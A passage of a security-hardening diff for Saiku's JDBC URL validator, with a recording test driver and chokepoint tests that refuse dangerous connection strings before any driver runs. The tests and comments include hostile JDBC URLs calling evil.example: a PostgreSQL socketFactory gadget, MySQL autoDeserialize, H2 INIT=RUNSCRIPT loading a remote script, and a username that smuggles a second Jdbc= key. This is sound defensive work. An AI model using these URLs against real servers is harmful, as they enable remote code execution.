+        if (depth > MAX_NESTING) {
+            throw reject("JDBC URL nesting is too deep");
+        }
+        rejectControlCharacters(url);
+        String decoded = percentDecode(url);
+        rejectControlCharacters(decoded);
+
+        String scheme = schemeOf(decoded);
+        boolean wrapper = "mondrian".equals(scheme) || "mondrian4".equals(scheme);
+
+        // Coarsest gate first: an unknown driver is refused as such, whatever else the URL carries.
+        if (!wrapper && !isAllowedScheme(scheme)) {
+            throw reject("JDBC scheme '" + scheme + "' is not on the allowed list (extend it with -D"
+                    + ALLOWED_SCHEMES_PROPERTY + "=scheme1,scheme2)");
+        }
+
+        // H2's executable tokens and the property deny-list are checked on BOTH spellings: what
+        // the driver sees (raw) and what it would see after its own decoding.
+        rejectDangerousH2Tokens(url);
+        rejectDangerousH2Tokens(decoded);
+        rejectDeniedProperties(url, scheme);
+        rejectDeniedProperties(decoded, scheme);
+
+        if (wrapper) {
+            checkMondrianWrapper(url, depth);
+        }
+    }
+
+    /** The token between {@code jdbc:} and the next {@code :}, lower-cased. */
+    private static String schemeOf(String url) {
+        String lower = url.toLowerCase(Locale.ROOT);
+        if (!lower.startsWith(PREFIX)) {
+            throw reject("URL must start with jdbc:<scheme>:");
+        }
+        String rest = lower.substring(PREFIX.length());
+        int colon = rest.indexOf(':');
+        if (colon <= 0) {
+            throw reject("malformed JDBC scheme");
+        }
+        String scheme = rest.substring(0, colon);
+        if (!SCHEME_TOKEN.matcher(scheme).matches()) {
+            throw reject("malformed JDBC scheme");
+        }
+        return scheme;
+    }
+
+    private static boolean isAllowedScheme(String scheme) {
+        if (BUILT_IN_SCHEMES.contains(scheme)) {
+            return true;
+        }
+        return extraSchemes().contains(scheme);
+    }
+
+    private static Set<String> extraSchemes() {
+        String extra = null;
+        try {
+            extra = System.getProperty(ALLOWED_SCHEMES_PROPERTY);
+        } catch (SecurityException ignored) {
+            // no property access -> built-ins only
+        }
+        Set<String> out = new HashSet<>();
+        if (extra != null) {
+            for (String s : extra.split(",")) {
+                String t = s.trim().toLowerCase(Locale.ROOT);
+                if (!t.isEmpty()) {
+                    out.add(t);
+                }
+            }
+        }
+        return out;
+    }
+
+    private static void rejectControlCharacters(String s) {
+        for (int i = 0; i < s.length(); i++) {
+            char c = s.charAt(i);
+            if (c < 0x20 || c == 0x7f) {
+                throw reject("control characters are not permitted");
+            }
+        }
+    }
+
+    private static void rejectDangerousH2Tokens(String url) {
+        // Only the H2 driver weaponises these tokens; gate on an H2 sub-URL being present anywhere
+        // in the (possibly wrapped) string so a password that happens to contain "init=" on another
+        // backend is not a false positive.
+        if (!url.toLowerCase(Locale.ROOT).contains("jdbc:h2:")) {
+            return;
+        }
+        if (H2_INIT.matcher(url).find()) {
+            throw reject("H2 INIT= run-on-connect is not permitted");
+        }
+        if (H2_RUNSCRIPT.matcher(url).find()) {
+            throw reject("H2 RUNSCRIPT is not permitted");
+        }
+        if (H2_CREATE_EXEC.matcher(url).find()) {
+            throw reject("H2 CREATE ALIAS/TRIGGER/FORCE is not permitted");
+        }
+        if (H2_SHUTDOWN.matcher(url).find()) {
+            throw reject("H2 SHUTDOWN is not permitted");
+        }
+    }
+
+    private static void rejectDeniedProperties(String url, String scheme) {
+        boolean calcite = "calcite".equals(scheme) || "avatica".equals(scheme);
+        String[] tokens = PROPERTY_DELIMITERS.split(url);
+        for (int i = 0; i < tokens.length; i++) {
+            String token = tokens[i];
+            if (i == 0) {
+                // Some drivers start their properties right after the scheme
+                // (jdbc:calcite:model=..., jdbc:mondrian:Jdbc=...): drop the "jdbc:<scheme>:" head
+                // so the first key is seen as a key.
+                token = SCHEME_HEAD.matcher(token).replaceFirst("");
+            }
+            int eq = token.indexOf('=');
+            if (eq <= 0) {
+                continue;
+            }
+            String key = normaliseKey(token.substring(0, eq));
+            if (key.isEmpty()) {
+                continue;
+            }
+            if (DENIED_KEYS.contains(key)) {
+                throw reject("connection property '" + key + "' is not permitted");
+            }
+            for (String prefix : DENIED_KEY_PREFIXES) {
+                if (key.startsWith(prefix)) {
+                    throw reject("connection property family '" + prefix + "*' is not permitted");
+                }
+            }
+            if (calcite && DENIED_CALCITE_KEYS.contains(key)) {
+                throw reject("Calcite model / schema-factory operands are not permitted");
+            }
+        }
+    }
+
+    /** Lower-case and strip the characters drivers ignore or that an attacker can vary. */
+    static String normaliseKey(String rawKey) {
+        return KEY_NOISE.matcher(rawKey.toLowerCase(Locale.ROOT)).replaceAll("");
+    }
+
+    /**
+     * Structural checks on a {@code jdbc:mondrian:} / {@code jdbc:mondrian4:} wrapper: every
+     * {@code Jdbc=} occurrence is validated as a JDBC URL in its own right (Mondrian's property
+     * list lets a later duplicate key win, so <em>all</em> of them are checked), and every
+     * {@code DataSource=} must be a plain JNDI name.
+     */
+    private static void checkMondrianWrapper(String url, int depth) {
+        String lower = url.toLowerCase(Locale.ROOT);
+        int bodyStart = lower.startsWith("jdbc:mondrian4:") ? "jdbc:mondrian4:".length() : "jdbc:mondrian:".length();
+        String body = url.substring(bodyStart);
+
+        Map<String, List<String>> props = parseMondrianBody(body);
+
+        for (String inner : props.getOrDefault("jdbc", List.of())) {
+            String v = unquote(inner);
+            if (!v.isEmpty()) {
+                checkUrl(v, depth + 1);
+            }
+        }
+        for (String ds : props.getOrDefault("datasource", List.of())) {
+            String v = unquote(ds);
+            Matcher m = URL_SCHEME_PREFIX.matcher(v);
+            if (m.find()) {
+                String jndiScheme = m.group(1).toLowerCase(Locale.ROOT);
+                if (!"java".equals(jndiScheme) && !"osgi".equals(jndiScheme)) {
+                    throw reject("Mondrian DataSource= must be a plain JNDI name, not a URL");
+                }
+            }
+        }
+    }
+
+    private static Map<String, List<String>> parseMondrianBody(String body) {
+        Matcher m = MONDRIAN_KEY.matcher(body);
+        List<String> keys = new ArrayList<>();
+        List<Integer> valueStarts = new ArrayList<>();
+        List<Integer> matchStarts = new ArrayList<>();
+        while (m.find()) {
+            keys.add(m.group(1).toLowerCase(Locale.ROOT));
+            valueStarts.add(m.end());
+            matchStarts.add(m.start());
+        }
+        Map<String, List<String>> out = new LinkedHashMap<>();
+        for (int i = 0; i < keys.size(); i++) {
+            int end = (i + 1 < keys.size()) ? matchStarts.get(i + 1) : body.length();
+            String value = body.substring(valueStarts.get(i), end).trim();
+            out.computeIfAbsent(keys.get(i), k -> new ArrayList<>()).add(value);
+        }
+        return out;
+    }
+
+    private static String unquote(String v) {
+        String s = v.trim();
+        if (s.length() >= 2) {
+            char first = s.charAt(0);
+            char last = s.charAt(s.length() - 1);
+            if ((first == '\'' && last == '\'') || (first == '"' && last == '"')) {
+                return s.substring(1, s.length() - 1).trim();
+            }
+        }
+        return s;
+    }
+
+    /**
+     * Percent-decode repeatedly (bounded) so a doubly-encoded key cannot slip past the deny-list.
+     * Unlike {@link java.net.URLDecoder} this leaves {@code +} alone — it is a legitimate scheme
+     * character ({@code jdbc:mysql+srv:}) — and tolerates malformed escapes by copying them through.
+     */
+    static String percentDecode(String s) {
+        String current = s;
+        for (int round = 0; round < 3; round++) {
+            String next = percentDecodeOnce(current);
+            if (next.equals(current)) {
+                return current;
+            }
+            current = next;
+        }
+        return current;
+    }
+
+    private static String percentDecodeOnce(String s) {
+        if (s.indexOf('%') < 0) {
+            return s;
+        }
+        ByteArrayOutputStream out = new ByteArrayOutputStream(s.length());
+        byte[] bytes = s.getBytes(StandardCharsets.UTF_8);
+        for (int i = 0; i < bytes.length; i++) {
+            byte b = bytes[i];
+            if (b == '%' && i + 2 < bytes.length) {
+                int hi = Character.digit(bytes[i + 1], 16);
+                int lo = Character.digit(bytes[i + 2], 16);
+                if (hi >= 0 && lo >= 0) {
+                    out.write((hi << 4) | lo);
+                    i += 2;
+                    continue;
+                }
+            }
+            out.write(b);
+        }
+        return new String(out.toByteArray(), StandardCharsets.UTF_8);
+    }
+
+    private static IllegalArgumentException reject(String reason) {
+        // Never echo the URL: it may carry credentials, and the reason is all an operator needs.
+        LOG.warn("Rejected datasource JDBC URL: {}", reason);
+        return new IllegalArgumentException("Invalid datasource JDBC URL: " + reason);
+    }
+}

--- a/saiku-core/saiku-service/src/main/java/org/saiku/service/datasource/JdbcUrlPolicy.java
+++ b/saiku-core/saiku-service/src/main/java/org/saiku/service/datasource/JdbcUrlPolicy.java
@@ -230,9 +230,18 @@ public final class JdbcUrlPolicy {
 
     private static final Pattern SCHEME_TOKEN = Pattern.compile("[a-z0-9+.-]+");
 
-    private static final Pattern SCHEME_HEAD = Pattern.compile("(?i)^jdbc:[a-z0-9+.-]*:");
-
-    private static final Pattern PROPERTY_DELIMITERS = Pattern.compile("[;&?#]");
+    /**
+     * saiku#1902 (SEC bypass): matches EVERY {@code key=} occurrence anywhere in the string, not
+     * just the first one per {@code ;&?#}-delimited token. The old token split missed keys nested
+     * in MySQL/MariaDB host-group and {@code address=(...)} forms
+     * ({@code jdbc:mysql://(host=h,socketFactory=evil)/db}) and Teradata's comma-separated params
+     * ({@code jdbc:teradata://h/DATABASE=x,LOGMECH=y,socketFactory=evil}) — a key run is a maximal
+     * span of {@code [A-Za-z0-9_.-]} immediately before an {@code =} (optional whitespace between),
+     * so it is found regardless of the {@code ( , / ; & ?} that precedes it. Values are never
+     * treated as keys (only a run directly followed by {@code =} matches), and we reject only
+     * known-dangerous key names, so a comma or paren inside a legitimate value can't produce one.
+     */
+    private static final Pattern PROPERTY_KEY = Pattern.compile("([A-Za-z0-9_.\\-]+)\\s*=");
 
     private static final Pattern KEY_NOISE = Pattern.compile("[\\s_.\\-'\"]");
 
@@ -264,10 +273,31 @@ public final class JdbcUrlPolicy {
         return DriverManager.getConnection(url, user, password);
     }
 
-    /** Validate, then {@link DriverManager#getConnection(String, Properties)}. */
+    /**
+     * Validate the URL <em>and</em> the {@code info} property map, then
+     * {@link DriverManager#getConnection(String, Properties)}. A driver merges {@code info} with
+     * any properties in the URL, so a denied key smuggled through the map (e.g. a future caller
+     * copying request-supplied properties) is exactly as dangerous as one in the URL. Today's
+     * callers only put {@code user}/{@code password} here, which pass.
+     */
     public static Connection openConnection(String url, Properties info) throws SQLException {
         validate(url);
+        rejectDeniedInfoProperties(info);
         return DriverManager.getConnection(url, info);
+    }
+
+    /** Apply the connection-property deny-list to the keys of a {@link Properties} map. */
+    static void rejectDeniedInfoProperties(Properties info) {
+        if (info == null) {
+            return;
+        }
+        for (String name : info.stringPropertyNames()) {
+            String key = normaliseKey(name);
+            if (!key.isEmpty()) {
+                // false: the calcite model/schemaFactory operands are URL-only, never info keys.
+                rejectIfDeniedKey(key, false);
+            }
+        }
     }
 
     /**
@@ -426,34 +456,28 @@ public final class JdbcUrlPolicy {
 
     private static void rejectDeniedProperties(String url, String scheme) {
         boolean calcite = "calcite".equals(scheme) || "avatica".equals(scheme);
-        String[] tokens = PROPERTY_DELIMITERS.split(url);
-        for (int i = 0; i < tokens.length; i++) {
-            String token = tokens[i];
-            if (i == 0) {
-                // Some drivers start their properties right after the scheme
-                // (jdbc:calcite:model=..., jdbc:mondrian:Jdbc=...): drop the "jdbc:<scheme>:" head
-                // so the first key is seen as a key.
-                token = SCHEME_HEAD.matcher(token).replaceFirst("");
-            }
-            int eq = token.indexOf('=');
-            if (eq <= 0) {
-                continue;
-            }
-            String key = normaliseKey(token.substring(0, eq));
+        Matcher m = PROPERTY_KEY.matcher(url);
+        while (m.find()) {
+            String key = normaliseKey(m.group(1));
             if (key.isEmpty()) {
                 continue;
             }
-            if (DENIED_KEYS.contains(key)) {
-                throw reject("connection property '" + key + "' is not permitted");
+            rejectIfDeniedKey(key, calcite);
+        }
+    }
+
+    /** The deny-list decision for a single normalised property key. */
+    private static void rejectIfDeniedKey(String key, boolean calcite) {
+        if (DENIED_KEYS.contains(key)) {
+            throw reject("connection property '" + key + "' is not permitted");
+        }
+        for (String prefix : DENIED_KEY_PREFIXES) {
+            if (key.startsWith(prefix)) {
+                throw reject("connection property family '" + prefix + "*' is not permitted");
             }
-            for (String prefix : DENIED_KEY_PREFIXES) {
-                if (key.startsWith(prefix)) {
-                    throw reject("connection property family '" + prefix + "*' is not permitted");
-                }
-            }
-            if (calcite && DENIED_CALCITE_KEYS.contains(key)) {
-                throw reject("Calcite model / schema-factory operands are not permitted");
-            }
+        }
+        if (calcite && DENIED_CALCITE_KEYS.contains(key)) {
+            throw reject("Calcite model / schema-factory operands are not permitted");
         }
     }
 
@@ -465,8 +489,19 @@ public final class JdbcUrlPolicy {
     /**
      * Structural checks on a {@code jdbc:mondrian:} / {@code jdbc:mondrian4:} wrapper: every
      * {@code Jdbc=} occurrence is validated as a JDBC URL in its own right (Mondrian's property
-     * list lets a later duplicate key win, so <em>all</em> of them are checked), and every
-     * {@code DataSource=} must be a plain JNDI name.
+     * list lets a later duplicate key win, so <em>all</em> of them are checked), every
+     * {@code DataSource=} must be a plain JNDI name, and the class-instantiating hooks
+     * {@code DynamicSchemaProcessor=} / {@code DataSourceChangeListener=} are refused outright —
+     * Mondrian would {@code Class.forName}+instantiate whatever they name, and no legitimate Saiku
+     * datasource sets them (saiku#1903, defence in depth).
+     *
+     * <p>Note: two other Mondrian keys also drive class-loading / inline content —
+     * {@code JdbcDrivers=} (names the JDBC driver class, a legitimate and required part of a
+     * Mondrian connect string) and {@code CatalogContent=} (an inline schema). These are left
+     * permitted on purpose: a Mondrian wrapper is only ever authored as part of a datasource
+     * descriptor or schema, which saiku#1903 + saiku#1904 make admin-only to write — so their
+     * class-loading is admin-reachable-by-design, and blanket-denying {@code JdbcDrivers=} would
+     * break every real Mondrian datasource.
      */
     private static void checkMondrianWrapper(String url, int depth) {
         String lower = url.toLowerCase(Locale.ROOT);
@@ -474,6 +509,14 @@ public final class JdbcUrlPolicy {
         String body = url.substring(bodyStart);
 
         Map<String, List<String>> props = parseMondrianBody(body);
+
+        // parseMondrianBody lower-cases its keys.
+        if (props.containsKey("dynamicschemaprocessor")) {
+            throw reject("Mondrian DynamicSchemaProcessor= (class instantiation) is not permitted in a datasource");
+        }
+        if (props.containsKey("datasourcechangelistener")) {
+            throw reject("Mondrian DataSourceChangeListener= (class instantiation) is not permitted in a datasource");
+        }
 
         for (String inner : props.getOrDefault("jdbc", List.of())) {
             String v = unquote(inner);

--- a/saiku-core/saiku-service/src/main/java/org/saiku/service/ossie/OssieGraphService.java
+++ b/saiku-core/saiku-service/src/main/java/org/saiku/service/ossie/OssieGraphService.java
@@ -5,7 +5,6 @@
 package org.saiku.service.ossie;
 
 import java.sql.Connection;
-import java.sql.DriverManager;
 import java.sql.PreparedStatement;
 import java.sql.ResultSet;
 import java.util.ArrayList;
@@ -14,6 +13,7 @@ import java.util.List;
 import java.util.Map;
 import java.util.Properties;
 import org.saiku.datasources.connection.ISaikuConnection;
+import org.saiku.service.datasource.JdbcUrlPolicy;
 import org.saiku.service.olap.OlapDiscoverService;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
@@ -128,7 +128,7 @@ public class OssieGraphService {
         boolean hasCycle = false;
         long start = System.currentTimeMillis();
 
-        try (Connection c = DriverManager.getConnection(url, user == null ? "" : user, pass == null ? "" : pass)) {
+        try (Connection c = JdbcUrlPolicy.openConnection(url, user == null ? "" : user, pass == null ? "" : pass)) {
             try (PreparedStatement ps = c.prepareStatement(walkSql)) {
                 ps.setString(1, rootId);
                 ps.setInt(2, d);
@@ -184,7 +184,7 @@ public class OssieGraphService {
         ISaikuConnection saikuConn = olapDiscoverService.getConnectionManager().getConnection(connectionName);
         if (saikuConn == null) throw new IllegalStateException("No live connection for '" + connectionName + "'");
         Properties p = saikuConn.getProperties();
-        try (Connection c = DriverManager.getConnection(
+        try (Connection c = JdbcUrlPolicy.openConnection(
                 p.getProperty(ISaikuConnection.URL_KEY),
                 orEmpty(p.getProperty(ISaikuConnection.USERNAME_KEY)),
                 orEmpty(p.getProperty(ISaikuConnection.PASSWORD_KEY)))) {
@@ -260,7 +260,7 @@ public class OssieGraphService {
         if (saikuConn == null) throw new IllegalStateException("No live connection for '" + connectionName + "'");
         Properties p = saikuConn.getProperties();
         Map<String, Object> out = new LinkedHashMap<>();
-        try (Connection c = DriverManager.getConnection(
+        try (Connection c = JdbcUrlPolicy.openConnection(
                         p.getProperty(ISaikuConnection.URL_KEY),
                         orEmpty(p.getProperty(ISaikuConnection.USERNAME_KEY)),
                         orEmpty(p.getProperty(ISaikuConnection.PASSWORD_KEY)));
@@ -330,7 +330,7 @@ public class OssieGraphService {
         if (saikuConn == null) throw new IllegalStateException("No live connection for '" + connectionName + "'");
         Properties p = saikuConn.getProperties();
         long start = System.currentTimeMillis();
-        try (Connection c = DriverManager.getConnection(
+        try (Connection c = JdbcUrlPolicy.openConnection(
                 p.getProperty(ISaikuConnection.URL_KEY),
                 orEmpty(p.getProperty(ISaikuConnection.USERNAME_KEY)),
                 orEmpty(p.getProperty(ISaikuConnection.PASSWORD_KEY)))) {

--- a/saiku-core/saiku-service/src/test/java/org/saiku/datasources/connection/RecordingJdbcDriver.java
+++ b/saiku-core/saiku-service/src/test/java/org/saiku/datasources/connection/RecordingJdbcDriver.java
@@ -1,0 +1,171 @@
+/*
+ *   Copyright 2026 Spicule Ltd
+ *   Apache License, Version 2.0.
+ */
+package org.saiku.datasources.connection;
+
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Method;
+import java.lang.reflect.Proxy;
+import java.sql.Connection;
+import java.sql.Driver;
+import java.sql.DriverPropertyInfo;
+import java.sql.SQLFeatureNotSupportedException;
+import java.util.Collections;
+import java.util.Locale;
+import java.util.Properties;
+import java.util.concurrent.atomic.AtomicInteger;
+import java.util.logging.Logger;
+import org.olap4j.OlapConnection;
+import org.olap4j.OlapWrapper;
+import org.olap4j.metadata.NamedList;
+
+/**
+ * A catch-all {@link Driver} for the saiku#1902 chokepoint tests. It accepts <em>every</em>
+ * {@code jdbc:} URL and counts how often {@link DriverManager} asked it to connect, so a test can
+ * prove that a rejected URL never reached any driver at all (count stays 0) and that a permitted
+ * one did (count 1). Registered drivers are consulted in registration order, so the real H2 /
+ * HSQLDB drivers still win for their own URLs — this one only sees what nobody else claimed.
+ *
+ * <p>{@link #connect} hands back a JDK-proxy {@link Connection} that also implements
+ * {@link OlapWrapper} and unwraps to an empty {@link OlapConnection}, which is exactly enough for
+ * {@code SaikuOlapConnection.connect()} to report success without a real OLAP backend.
+ */
+public final class RecordingJdbcDriver implements Driver {
+
+    public final AtomicInteger connectCalls = new AtomicInteger();
+
+    public volatile String lastUrl;
+
+    @Override
+    public Connection connect(String url, Properties info) {
+        if (!acceptsURL(url)) {
+            return null;
+        }
+        connectCalls.incrementAndGet();
+        lastUrl = url;
+        return olapWrapperConnection();
+    }
+
+    @Override
+    public boolean acceptsURL(String url) {
+        return url != null && url.toLowerCase(Locale.ROOT).startsWith("jdbc:");
+    }
+
+    @Override
+    public DriverPropertyInfo[] getPropertyInfo(String url, Properties info) {
+        return new DriverPropertyInfo[0];
+    }
+
+    @Override
+    public int getMajorVersion() {
+        return 1;
+    }
+
+    @Override
+    public int getMinorVersion() {
+        return 0;
+    }
+
+    @Override
+    public boolean jdbcCompliant() {
+        return false;
+    }
+
+    @Override
+    public Logger getParentLogger() throws SQLFeatureNotSupportedException {
+        throw new SQLFeatureNotSupportedException();
+    }
+
+    private static Connection olapWrapperConnection() {
+        ClassLoader loader = RecordingJdbcDriver.class.getClassLoader();
+        Object olap = Proxy.newProxyInstance(loader, new Class<?>[] {OlapConnection.class}, new Stub("olap"));
+        return (Connection) Proxy.newProxyInstance(
+                loader, new Class<?>[] {Connection.class, OlapWrapper.class}, new Stub("jdbc", olap));
+    }
+
+    /** Minimal behaviour: unwrap to the olap proxy, report open, empty catalog list, defaults elsewhere. */
+    private static final class Stub implements InvocationHandler {
+
+        private final String name;
+        private final Object unwrapped;
+
+        Stub(String name) {
+            this(name, null);
+        }
+
+        Stub(String name, Object unwrapped) {
+            this.name = name;
+            this.unwrapped = unwrapped;
+        }
+
+        @Override
+        public Object invoke(Object proxy, Method method, Object[] args) {
+            switch (method.getName()) {
+                case "unwrap":
+                    return unwrapped != null ? unwrapped : proxy;
+                case "isWrapperFor":
+                    return true;
+                case "isClosed":
+                    return false;
+                case "getOlapCatalogs":
+                    return Proxy.newProxyInstance(
+                            RecordingJdbcDriver.class.getClassLoader(),
+                            new Class<?>[] {NamedList.class},
+                            new EmptyList());
+                case "toString":
+                    return "recording-" + name + "-connection";
+                case "hashCode":
+                    return System.identityHashCode(proxy);
+                case "equals":
+                    return proxy == args[0];
+                default:
+                    return defaultValue(method.getReturnType());
+            }
+        }
+    }
+
+    private static final class EmptyList implements InvocationHandler {
+        @Override
+        public Object invoke(Object proxy, Method method, Object[] args) {
+            switch (method.getName()) {
+                case "size":
+                    return 0;
+                case "isEmpty":
+                    return true;
+                case "iterator":
+                    return Collections.emptyIterator();
+                case "toString":
+                    return "[]";
+                case "hashCode":
+                    return System.identityHashCode(proxy);
+                case "equals":
+                    return proxy == args[0];
+                default:
+                    return defaultValue(method.getReturnType());
+            }
+        }
+    }
+
+    private static Object defaultValue(Class<?> type) {
+        if (type == boolean.class) {
+            return false;
+        }
+        if (type == int.class || type == short.class || type == byte.class) {
+            return 0;
+        }
+        if (type == long.class) {
+            return 0L;
+        }
+        if (type == float.class) {
+            return 0f;
+        }
+        if (type == double.class) {
+            return 0d;
+        }
+        if (type == char.class) {
+            return '\0';
+        }
+        return null;
+    }
+}

--- a/saiku-core/saiku-service/src/test/java/org/saiku/datasources/connection/SaikuConnectionPolicyChokepointTest.java
+++ b/saiku-core/saiku-service/src/test/java/org/saiku/datasources/connection/SaikuConnectionPolicyChokepointTest.java
@@ -1,0 +1,207 @@
+/*
+ *   Copyright 2026 Spicule Ltd
+ *   Apache License, Version 2.0.
+ */
+package org.saiku.datasources.connection;
+
+import static org.junit.Assert.assertEquals;
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assert.assertNotNull;
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assert.fail;
+
+import java.sql.DriverManager;
+import java.util.Properties;
+import java.util.concurrent.atomic.AtomicBoolean;
+import org.junit.After;
+import org.junit.Before;
+import org.junit.Rule;
+import org.junit.Test;
+import org.junit.rules.TemporaryFolder;
+import org.saiku.datasources.datasource.SaikuDatasource;
+import org.saiku.service.datasource.JdbcUrlPolicy;
+
+/**
+ * saiku#1902 — call-site (wiring) coverage for the connection chokepoint. These drive the REAL
+ * {@link SaikuOlapConnection} / {@link SaikuOssieConnection} / {@link SaikuConnectionFactory} —
+ * the exact objects {@code SecurityAwareConnectionManager.connect} builds for every datasource,
+ * however it was loaded — and prove with a catch-all recording driver that a forbidden URL is
+ * refused <em>before</em> {@link DriverManager} consults any driver, while a permitted one still
+ * connects.
+ */
+public class SaikuConnectionPolicyChokepointTest {
+
+    private static final String TEST_SCHEME = "saikutest";
+
+    private static final String PG_GADGET = "jdbc:postgresql://evil.example:5432/db"
+            + "?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext"
+            + "&socketFactoryArg=http://evil.example/ctx.xml";
+
+    @Rule
+    public TemporaryFolder tmp = new TemporaryFolder();
+
+    private RecordingJdbcDriver driver;
+
+    @Before
+    public void registerRecordingDriver() throws Exception {
+        driver = new RecordingJdbcDriver();
+        DriverManager.registerDriver(driver);
+        System.setProperty(JdbcUrlPolicy.ALLOWED_SCHEMES_PROPERTY, TEST_SCHEME);
+    }
+
+    @After
+    public void deregisterRecordingDriver() throws Exception {
+        DriverManager.deregisterDriver(driver);
+        System.clearProperty(JdbcUrlPolicy.ALLOWED_SCHEMES_PROPERTY);
+    }
+
+    /* ---------------------------------------------------------------- OLAP (Mondrian / olap4j) */
+
+    @Test
+    public void olapConnection_refusesPostgresSocketFactoryGadget_beforeAnyDriverIsAsked() throws Exception {
+        assertRefusedBeforeDriver(new SaikuOlapConnection("evil", olapProps(mondrian(PG_GADGET))));
+    }
+
+    @Test
+    public void olapConnection_refusesMysqlAutoDeserialize_beforeAnyDriverIsAsked() throws Exception {
+        assertRefusedBeforeDriver(new SaikuOlapConnection(
+                "evil",
+                olapProps(mondrian("jdbc:mysql://evil.example/db?autoDeserialize=true&queryInterceptors=x.Y"))));
+    }
+
+    @Test
+    public void olapConnection_refusesH2Init_beforeAnyDriverIsAsked() throws Exception {
+        assertRefusedBeforeDriver(new SaikuOlapConnection(
+                "evil", olapProps(mondrian("jdbc:h2:mem:x;INIT=RUNSCRIPT FROM 'http://evil.example/p.sql'"))));
+    }
+
+    @Test
+    public void olapConnection_refusesUnknownScheme_beforeAnyDriverIsAsked() throws Exception {
+        assertRefusedBeforeDriver(new SaikuOlapConnection("evil", olapProps("jdbc:evil://h/db")));
+    }
+
+    @Test
+    public void olapConnection_validatesTheFinalUrl_soCredentialsCannotReinjectJdbc() throws Exception {
+        // The descriptor's URL is clean; the USERNAME smuggles a second Jdbc= key, which
+        // SaikuOlapConnection appends as ';JdbcUser=<username>;' for the Mondrian driver. A check
+        // that ran before the append would pass this. The chokepoint checks the final string.
+        Properties props = new Properties();
+        props.setProperty(ISaikuConnection.DRIVER_KEY, "mondrian.olap4j.MondrianOlap4jDriver");
+        props.setProperty(
+                ISaikuConnection.URL_KEY,
+                "jdbc:mondrian:Jdbc=jdbc:h2:mem:clean;Catalog=file:/x.xml;JdbcDrivers=org.h2.Driver");
+        props.setProperty(ISaikuConnection.USERNAME_KEY, "sa;Jdbc=" + PG_GADGET);
+        props.setProperty(ISaikuConnection.PASSWORD_KEY, "");
+        assertRefusedBeforeDriver(new SaikuOlapConnection("evil", props));
+    }
+
+    @Test
+    public void olapConnection_refusesDriverClassThatIsNotADriver_withoutRunningItsStaticInitialiser()
+            throws Exception {
+        Properties props = olapProps("jdbc:" + TEST_SCHEME + ":ok");
+        props.setProperty(ISaikuConnection.DRIVER_KEY, NotADriver.class.getName());
+        SaikuOlapConnection con = new SaikuOlapConnection("evil", props);
+        try {
+            con.connect();
+            fail("a non-Driver class must be refused");
+        } catch (IllegalArgumentException expected) {
+            assertTrue(expected.getMessage(), expected.getMessage().contains("java.sql.Driver"));
+        }
+        assertFalse("the class must be type-checked BEFORE it is initialised", NOT_A_DRIVER_INITIALISED.get());
+        assertEquals(0, driver.connectCalls.get());
+    }
+
+    @Test
+    public void olapConnection_acceptsPermittedUrl_andConnects() throws Exception {
+        SaikuOlapConnection con = new SaikuOlapConnection("ok", olapProps("jdbc:" + TEST_SCHEME + ":ok"));
+        assertTrue("a permitted URL must still connect", con.connect());
+        assertTrue(con.initialized());
+        assertEquals("exactly one driver call", 1, driver.connectCalls.get());
+        assertEquals("jdbc:" + TEST_SCHEME + ":ok;", driver.lastUrl);
+    }
+
+    /* ---------------------------------------------------------------- OSSIE (Calcite warehouse) */
+
+    @Test
+    public void ossieConnection_refusesGadgetWarehouseUrl_beforeAnyDriverIsAsked() throws Exception {
+        Properties props = new Properties();
+        props.setProperty(
+                ISaikuConnection.OSSIE_YAML_KEY, tmp.newFile("model.ossie.yaml").getAbsolutePath());
+        props.setProperty(ISaikuConnection.URL_KEY, PG_GADGET);
+        props.setProperty(ISaikuConnection.USERNAME_KEY, "u");
+        props.setProperty(ISaikuConnection.PASSWORD_KEY, "p");
+        assertRefusedBeforeDriver(new SaikuOssieConnection("evil", props));
+    }
+
+    @Test
+    public void ossieConnection_escapesDescriptorValuesInTheCalciteModel() {
+        assertEquals("a\\\"b\\\\c\\nd", SaikuOssieConnection.jsonEscape("a\"b\\c\nd"));
+        assertEquals("", SaikuOssieConnection.jsonEscape(null));
+    }
+
+    /* ---------------------------------------------------------------- factory (what the manager calls) */
+
+    @Test
+    public void connectionFactory_refusesGadgetOlapDatasource_beforeAnyDriverIsAsked() throws Exception {
+        SaikuDatasource ds = new SaikuDatasource("evil", SaikuDatasource.Type.OLAP, olapProps(mondrian(PG_GADGET)));
+        try {
+            SaikuConnectionFactory.getConnection(ds);
+            fail("the factory must propagate the policy rejection");
+        } catch (IllegalArgumentException expected) {
+            assertTrue(expected.getMessage(), expected.getMessage().contains("Invalid datasource JDBC URL"));
+        }
+        assertEquals("no driver may be consulted for a rejected URL", 0, driver.connectCalls.get());
+    }
+
+    @Test
+    public void connectionFactory_stillOpensPermittedOlapDatasource() throws Exception {
+        SaikuDatasource ds =
+                new SaikuDatasource("ok", SaikuDatasource.Type.OLAP, olapProps("jdbc:" + TEST_SCHEME + ":ok"));
+        ISaikuConnection con = SaikuConnectionFactory.getConnection(ds);
+        assertNotNull("a permitted datasource must yield a live connection", con);
+        assertTrue(con.initialized());
+        assertEquals(1, driver.connectCalls.get());
+    }
+
+    /* ---------------------------------------------------------------- helpers */
+
+    private void assertRefusedBeforeDriver(ISaikuConnection con) throws Exception {
+        try {
+            con.connect();
+            fail("expected the URL policy to refuse the connection");
+        } catch (IllegalArgumentException expected) {
+            assertTrue(expected.getMessage(), expected.getMessage().contains("Invalid datasource JDBC URL"));
+            assertFalse("rejection must not echo the URL", expected.getMessage().contains("evil.example"));
+        }
+        assertFalse(con.initialized());
+        assertEquals("no driver may be consulted for a rejected URL", 0, driver.connectCalls.get());
+    }
+
+    private static String mondrian(String inner) {
+        return "jdbc:mondrian:Jdbc=" + inner + ";Catalog=file:/tmp/x.xml;JdbcDrivers=org.postgresql.Driver";
+    }
+
+    /** OLAP descriptor props using the recording driver as the olap4j driver class. */
+    private static Properties olapProps(String location) {
+        Properties props = new Properties();
+        props.setProperty(ISaikuConnection.DRIVER_KEY, RecordingJdbcDriver.class.getName());
+        props.setProperty(ISaikuConnection.URL_KEY, location);
+        props.setProperty(ISaikuConnection.USERNAME_KEY, "sa");
+        props.setProperty(ISaikuConnection.PASSWORD_KEY, "");
+        return props;
+    }
+
+    /**
+     * Flipped by {@link NotADriver}'s static initialiser. Lives on the OUTER class on purpose:
